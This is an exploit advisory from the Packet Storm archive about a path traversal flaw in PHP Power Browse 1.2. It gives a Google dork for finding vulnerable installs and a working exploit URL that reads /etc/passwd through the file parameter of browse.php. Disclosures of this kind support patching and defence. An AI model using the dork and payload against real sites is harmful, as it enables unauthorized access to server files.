PHP Power Browse 1.2 Path Traversal

2016-08-05T00:00:00
ID PACKETSTORM:138197
Type packetstorm
Reporter Manuel Mancera
Modified 2016-08-05T00:00:00

Description

                                        
                                            `# Exploit Title: PHP Power Browse v1.2 - Path Traversal  
# Google Dork:  
intitle:PHP Power Browse inurl:browse.php  
# Exploit Author: Manuel Mancera (sinkmanu) | sinkmanu (at) gmail  
(dot) com  
# Software URL: https://github.com/arzynik/PHPPowerBrowse  
# Version: 1.2  
# Vulnerability Type : Path traversal  
# Severity : High  
  
### Description ###  
  
This file browser is vulnerable to path traversal and allow to an  
attacker to access to files and directories that are stored outside the  
web root folder.  
  
### Exploit ###  
  
http://site/browse.php?p=source&file=/etc/passwd  
  
`